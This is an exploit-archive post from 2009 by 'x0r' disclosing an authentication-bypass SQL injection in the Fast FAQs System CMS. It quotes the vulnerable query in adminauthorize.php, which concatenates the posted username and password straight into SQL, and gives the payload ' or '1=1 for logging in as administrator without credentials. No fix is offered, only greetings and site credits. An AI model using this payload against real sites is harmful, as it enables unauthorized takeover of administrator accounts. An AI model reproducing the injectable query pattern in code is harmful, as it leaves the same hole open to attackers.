[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Fast FAQs System (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-01-09
# Author : x0r
# Previous Title : Photobase 1.2 (language) Local File Inclusion Vulnerability
# Next Title : CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)


########################
# -=Fast FAQs System=- #
########################
Autore: x0r
Email: x0r@live.it
Cms Site: http://fastcreators.com/products/fast_faq/download.php
#########################

Bug In adminauthorize.php

$query = "select * from admin where userid='{$_POST['uname']}' AND
pass='{$_POST['pass']}'";

Exploit:

' or '1=1

#######################

Greetz: Anna...Strabica...Emetta... Vi Amo..

-- w00t Zone - w00tzone.org 

# www.Syue.com [2009-01-09]